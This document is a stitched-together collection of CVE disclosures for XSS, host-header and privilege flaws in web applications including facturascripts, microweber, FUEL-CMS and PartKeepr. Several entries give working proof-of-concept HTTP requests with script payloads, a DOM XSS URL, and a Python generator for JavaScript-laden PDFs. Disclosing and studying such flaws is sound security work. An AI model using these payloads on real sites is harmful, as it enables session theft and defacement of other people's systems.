Cross-site scripting - Reflected in Create Subaccount in GitHub repository neorazorx/facturascripts prior to 2022.07. This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of `same origin` page, etc ...

**Description**

Cross-site scripting - Reflected in Create Subaccount via codsubcuenta parameter.

**Proof of Concept**

    POST /facturascripts/EditSubcuenta HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------363416527826407339693188325960
    Content-Length: 1558
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/facturascripts/EditSubcuenta
    Cookie: fsNick=admin; fsLogkey=6pCG4IKxZ8oOUTkeVg5siaMfyR2q37Bb9JhYvAPlXH1rLWdcmFSNun0wjzQtED; fsLang=en_EN; fsCompany=1; lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; csrf-token-data=%7B%22value%22%3A%22jzfiNNFxYEXZET6aCcebWmglZOg2JPA9SsDylMUM%22%2C%22expiry%22%3A1651160325308%7D; lang=en_US; 
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="action"
    
    insert
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="activetab"
    
    EditSubcuenta
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="code"
    
    
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="multireqtoken"
    
    99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|5yqptN
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="codsubcuenta"
    
    <script>alert(1337)</script>
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="descripcion"
    
    123123
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="codejercicio"
    
    2022
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="idcuenta"
    
    
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="codcuentaesp"
    
    CLIENT
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="debe"
    
    0
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="haber"
    
    0
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="saldo"
    
    0
    -----------------------------363416527826407339693188325960--
    

**Step to reproduce**

1.  In Accounting section, choose New and fill all form with anything value

2.  Use Burp suite intercept this request and modify codsubcuenta parameter value with XSS payload and click Forward

3.  And alert(1337) execute

**Impact**

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

CVE-2022-1571: Cross-site scripting - Reflected in Create Subaccount in facturascripts

DOM XSS in microweber ver 1.2.15 in GitHub repository microweber/microweber prior to 1.2.16. inject arbitrary js code, deface website, steal cookie...

**Description**

Hi there, on your latest version docker images 3463db62a01f, vulnerable to DOM XSS.

**Proof of Concept**

    http://localhost/admin/order?filteringResults=true&id=1&isPaid=1&keyword=1&maxDate=01/01/1967&maxPrice=1&minDate=01/01/1967&minPrice=1&orderStatus=new&productId=the&productKeyword=the9958%22%0a%09%09%09%09});%0a%09%09%09});%0a%09%09alert(origin);%0a%09%09%09$(document).ready(function%20()%20{%0a%09%09%09%09var%20searchOrdersByProduct%20=%20new%20mw.autoComplete({%0a//
    

 

**Impact**

inject arbitrary js code, deface website, steal cookie...

**Occurrences**

order\_filtering.blade.php L157

DOM code

    $(document).ready(function () {
                    var searchOrdersByProduct = new mw.autoComplete({
                        element: "#js-orders-search-by-products",
                        placeholder: "<?php if ($productKeyword) { echo $productKeyword; } else { _e("Search by products..."); }?>",
                        autoComplete:true,
                        ajaxConfig: {
                            method: 'get',
                            url: mw.settings.api_url + 'get_content_admin?get_extra_data=1&content_type=product&keyword=${val}'
                        },
                        map: {
                            value: 'id',
                            title: 'title',
                            image: 'picture'
                        }
                    });
                    $(searchOrdersByProduct).on("change", function (e, val) {
                        $(".js-orders-search-product").val(val[0].id).trigger('change')
                        $(".js-orders-search-product-keyword").val(val[0].title).trigger('change')
                    });
                });

CVE-2022-1555: DOM XSS in microweber ver 1.2.15  in microweber

Mattermost Playbooks plugin 1.25 and earlier fails to properly restrict user-level permissions, which allows playbook members to escalate their membership privileges and perform actions restricted to playbook admins.

CVE-2022-1548: Security Updates

A cross-site scripting (XSS) vulnerability in /public/admin/index.php?add_product of E-Commerce Website v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Title text field.

**Full-Ecommece-Website-Add\_Product-Stored\_XSS-POC**

*   Note => Login to admin
*   Description => Stored\_XSS at Product Title

**Step to Reproduct**

*   Login to admin -> Add Product -> input payload <img/src/onerror=prompt(10)> at Product Title -> Product Title

**Exploit**

**Vulnerable Code**

 

*   When inserting into the database, the input is not filtered out characters

**POC**

*   Injection Point

\------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_title"

<image/src/onerror=prompt(8)>

*   Request

POST /Full-Ecommece-Website/Codes/public/admin/index.php?add\_product HTTP/1.1
Host: localhost:8080
Content-Length: 1354971
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXtBAIsNDayF64Ebh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/Full-Ecommece-Website/Codes/public/admin/index.php?add\_product
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=oam3rcbi14nilh2pp3s21upev5; twk\_uuid\_5c2396fb7a79fc1bddf24b28={"uuid":"1.AGDzvqvmbboNUBtyBA0XLKxrviwKWw7HVKOjPqv5aIOJHjOnigPvpa5cn7QPGv6D5QwLM7ZIIBSpua1NrhQBpEeAdolcmuMk3JJtap3Nu2WjBL31HFdBqMF9VFcu8Olw","version":3,"domain":null,"ts":1647022863776}; TawkConnectionTime=0
Connection: close

------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_title"

<image/src/onerror=prompt(8)>
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_description"

hacked
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_price"

10000
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="short\_desc"

hacked
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="publish"

Publish
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_category\_id"

12
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_quantity"

1
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="file"; filename="car.png"
Content-Type: image/png

PNG

VIDEO POC https://drive.google.com/file/d/155K4qLwGI8kwctd5FijU9gzonSA2rMFz/view?usp=sharing

CVE-2022-27330: GitHub - CP04042K/Full-Ecommece-Website-Add_Product-Stored_XSS-POC

IBM Maximo Asset Management 7.6.1.1 and 7.6.1.2 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to inject HTTP HOST header, which will allow the attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 205680.

  

**Summary**

IBM Maximo Asset Management and the IBM Maximo Manage application in IBM Maximo Application Suite are vulnerable to Host header injection.

**Vulnerability Details**

**CVEID:**   CVE-2021-29854  
**DESCRIPTION:**   IBM Maximo Asset Management is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to inject HTTP HOST header, which will allow the attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/205680 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

This vulnerability affects the following versions of the IBM Maximo Asset Management core product and IBM Maximo Manage Application in IBM Maximo Application Suite.  Older versions of Maximo Asset Management may be impacted. The recommended action is to update to the latest version.

**Product versions affected:**

Affected Product(s)

Version(s)

IBM Maximo Asset Management

7.6.1.1

IBM Maximo Asset Management

7.6.1.2

Maximo Manage Application in IBM Maximo Application Suite

MAS 8.7-Manage 8.3

\* To determine the core product version, log in and view System Information. The core product version is the "Tivoli's process automation engine" version. Please consult the Platform Matrix for a list of supported product combinations.

**Remediation/Fixes**

The recommended solution is to download the appropriate Interim Fix or Fix Pack from Fix Central (What is Fix Central?) and apply for each affected product as soon as possible. Please see below for information on the fixes available for each product, version, and release. Follow the installation instructions in the ‘readme’ documentation provided with each fix pack or interim fix.

**For Maximo Asset Management 7.6:**

**For IBM Maximo Manage application in IBM Maximo Application Suite:**

First upgrade to Maximo Application Suite version 8.7.2 and then from the Catalog select Update Available for Manage 8.3.1.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

02 May 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.

**Document Location**

Worldwide

\[{"Type":"MASTER","Line of Business":{"code":"LOB02","label":"AI Applications"},"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLKT6","label":"IBM Maximo Asset Management"},"ARM Category":\[{"code":"a8m0z000000cvcNAAQ","label":"Security"}\],"Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.1"},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLL8M","label":"Maximo for Nuclear Power"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.1","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLL9G","label":"Maximo for Oil and Gas"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.1","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLL9Z","label":"Maximo for Transportation"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.2.5, 7.6.2.4, 7.6.2.3","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS5RRF","label":"IBM Maximo for Aviation"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.8, 7.6.7, 7.6.6","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLL84","label":"Maximo for Life Sciences"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLLAM","label":"Maximo for Utilities"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.0.2, 7.6.0.1","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSG2D3","label":"Maximo Spatial Asset Management"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.0.5, 7.6.0.4, 7.6.0.3, 7.6.0.2","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Type":"MASTER","Line of Business":{"code":"LOB02","label":"AI Applications"},"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLKSJ","label":"Maximo Asset Configuration Manager"},"ARM Category":\[{"code":"a8m0z000000cvcNAAQ","label":"Security"}\],"Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.6;7.6.7"},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSWT9A","label":"Control Desk"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.1.1, 7.6.1","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSKVFR","label":"Maximo for Service Providers"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.3.3, 7.6.3.2, 7.6.3.1","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}}\]

CVE-2021-29854: Security Bulletin: IBM Maximo Asset Management and the IBM Maximo Manage application in IBM Maximo Application Suite are vulnerable to Host Header Injection (CVE-2021-29854)

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS 1.5.1 that allows an authenticated user to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.  
1、login as admin .in the Assets page  
  
2、Use the following PoC to generate malicious files :

    # FROM https://github.com/osnr/horrifying-pdf-experiments
    import sys
    
    from pdfrw import PdfWriter
    from pdfrw.objects.pdfname import PdfName
    from pdfrw.objects.pdfstring import PdfString
    from pdfrw.objects.pdfdict import PdfDict
    from pdfrw.objects.pdfarray import PdfArray
    
    def make_js_action(js):
        action = PdfDict()
        action.S = PdfName.JavaScript
        action.JS = js
        return action
     
    def make_field(name, x, y, width, height, r, g, b, value=""):
        annot = PdfDict()
        annot.Type = PdfName.Annot
        annot.Subtype = PdfName.Widget
        annot.FT = PdfName.Tx
        annot.Ff = 2
        annot.Rect = PdfArray([x, y, x + width, y + height])
        annot.MaxLen = 160
        annot.T = PdfString.encode(name)
        annot.V = PdfString.encode(value)
     
        # Default appearance stream: can be arbitrary PDF XObject or
        # something. Very general.
        annot.AP = PdfDict()
     
        ap = annot.AP.N = PdfDict()
        ap.Type = PdfName.XObject
        ap.Subtype = PdfName.Form
        ap.FormType = 1
        ap.BBox = PdfArray([0, 0, width, height])
        ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])
        ap.stream = """
    %f %f %f rg
    0.0 0.0 %f %f re f
    """ % (r, g, b, width, height)
    
        # It took me a while to figure this out. See PDF spec:
        # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641
    
        # Basically, the appearance stream we just specified doesn't
        # follow the field rect if it gets changed in JS (at least not in
        # Chrome).
    
        # But this simple MK field here, with border/color
        # characteristics, _does_ follow those movements and resizes, so
        # we can get moving colored rectangles this way.
        annot.MK = PdfDict()
        annot.MK.BG = PdfArray([r, g, b])
    
        return annot
    
    def make_page(fields, script):
        page = PdfDict()
        page.Type = PdfName.Page
    
        page.Resources = PdfDict()
        page.Resources.Font = PdfDict()
        page.Resources.Font.F1 = PdfDict()
        page.Resources.Font.F1.Type = PdfName.Font
        page.Resources.Font.F1.Subtype = PdfName.Type1
        page.Resources.Font.F1.BaseFont = PdfName.Helvetica
    
        page.MediaBox = PdfArray([0, 0, 612, 792])
    
        page.Contents = PdfDict()
        page.Contents.stream = """
    BT
    /F1 24 Tf
    ET
        """
    
        annots = fields
    
        page.AA = PdfDict()
        # You probably should just wrap each JS action with a try/catch,
        # because Chrome does no error reporting or even logging otherwise;
        # you just get a silent failure.
        page.AA.O = make_js_action("""
    try {
      %s
    } catch (e) {
      app.alert(e.message);
    }
        """ % (script))
    
        page.Annots = PdfArray(annots)
        return page
    
    if len(sys.argv) > 1:
        js_file = open(sys.argv[1], 'r')
    
        fields = []
        for line in js_file:
            if not line.startswith('/// '): break
            pieces = line.split()
            params = [pieces[1]] + [float(token) for token in pieces[2:]]
            fields.append(make_field(*params))
    
        js_file.seek(0)
    
        out = PdfWriter()
        out.addpage(make_page(fields, js_file.read()))
        out.write('result.pdf')
    

  
3、back to Assets then we can see xss-cookie.svg have been upload:  
  
4、when user click the xss.pdf it will trigger a XSS attack

CVE-2022-28599: A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 · Issue #595 · daylightstudio/FUEL-CMS

In SpringBootMovie <=1.2 when adding movie names, malicious code can be stored because there are no filtering parameters, resulting in stored XSS.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-28588: 一个后台存储型xss漏洞 · Issue #3 · lkmc2/SpringBootMovie

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

**WordPress Stafflist 3.1.2 Cross Site Scripting**

Posted May 3, 2022

Authored by Hassan Khan Yusufzai

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 74269ba0f910606e9499b4b87b6ba8ea243f907c7743fde42c4af10707d6f9da

Download | Favorite | View

**WordPress Stafflist 3.1.2 Cross Site Scripting**

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A cross site scripting reflected vulnerability has been identified inWordPress Plugin stafflist version less then 3.1.2. that allowsunauthenticated users to run arbitrary javascript code insideWordPress using Stafflist Plugin.# POChttp://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E# Vulnerable Parametersp and s parameters are vulnerable.# Vulnerable Code:$html = ($cur > 1 ? "<p class='pager'><ahref='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous</a></p>" : ""); //<

**File Tags**

*   ActiveX (932)
*   Advisory (77,240)
*   Arbitrary (15,057)
*   BBS (2,859)
*   Bypass (1,550)
*   CGI (1,010)
*   Code Execution (6,627)
*   Conference (668)
*   Cracker (797)
*   CSRF (3,268)
*   DoS (21,736)
*   Encryption (2,330)
*   Exploit (49,655)
*   File Inclusion (4,142)
*   File Upload (938)
*   Firewall (821)
*   Info Disclosure (2,542)
*   Intrusion Detection (850)
*   Java (2,780)
*   JavaScript (792)
*   Kernel (5,997)
*   Local (13,976)
*   Magazine (586)
*   Overflow (12,125)
*   Perl (1,410)
*   PHP (5,038)
*   Proof of Concept (2,276)
*   Protocol (3,290)
*   Python (1,389)
*   Remote (29,590)
*   Root (3,441)
*   Ruby (574)
*   Scanner (1,629)
*   Security Tool (7,672)
*   Shell (3,054)
*   Shellcode (1,201)
*   Sniffer (879)
*   Spoof (2,077)
*   SQL Injection (15,975)
*   TCP (2,350)
*   Trojan (672)
*   UDP (866)
*   Virus (658)
*   Vulnerability (30,362)
*   Web (8,972)
*   Whitepaper (3,710)
*   x86 (942)
*   XSS (17,290)
*   Other

**File Archives**

*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   September 2021
*   August 2021
*   July 2021
*   June 2021
*   Older

**Systems**

*   AIX (425)
*   Apple (1,875)
*   BSD (368)
*   CentOS (55)
*   Cisco (1,911)
*   Debian (5,948)
*   Fedora (1,690)
*   FreeBSD (1,241)
*   Gentoo (4,152)
*   HPUX (877)
*   iOS (317)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (41,937)
*   Mac OS X (683)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (478)
*   RedHat (11,372)
*   Slackware (941)
*   Solaris (1,606)
*   SUSE (1,444)
*   Ubuntu (7,747)
*   UNIX (9,051)
*   UnixWare (184)
*   Windows (6,373)
*   Other

WordPress Stafflist 3.1.2 Cross Site Scripting

A stored cross-site scripting (XSS) vulnerability in Pixelimity 1.0 allows attackers to execute arbitrary web scripts or HTML via the Title field in admin/pages.php?action=add_new

CVE-2022-28589: Cross-Site Scripting (XSS) in "admin/pages.php?action=add_new" · Issue #23 · pixelimity/pixelimity

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter.

**Description**

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter

**Reproduction Steps**

Browsing to Edit tab, select project and add new project.  
There, insert the following payload <img src=x onerror=alert(1)> in name field.

The request performed is the following, being name the vulnerable parameter :

    POST /api/projects HTTP/1.1
    Host: partkeepr.vuln
    Cookie: PHPSESSID=fju4llfcogfr2q9ug1bl982117
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Authorization: Basic YWRtaW46YWRtaW4=
    Content-Type: application/json
    X-Requested-With: XMLHttpRequest
    Content-Length: 303
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    {"name":"<img src=x onerror=alert(1)>","description":"","projectPartKeeprProjectBundleEntityProjectAttachments":[],"attachments":[],"projectPartKeeprProjectBundleEntityProjectParts":[],"parts":[],"projectPartKeeprProjectBundleEntityProjectRuns":[],"projectPartKeeprProjectBundleEntityReportProjects":[]}
    

Then, when another user goes to edit tab and clicks the project with the payload as name, XSS triggers

Apart from **projects** , the following tabs are also vulnerable : **footprints**,**manufacturers**,**storage locations**, **distributors**, **part measurement units** , **units** and **batch jobs**

**System Information**

*   PartKeepr Version: 1.4.0
*   Operating System: LInux
*   Web Server: Apache
*   PHP Version: 7.4
*   Database and version: Mysql
*   Reproducible on the demo system: Yes

Tag

#xss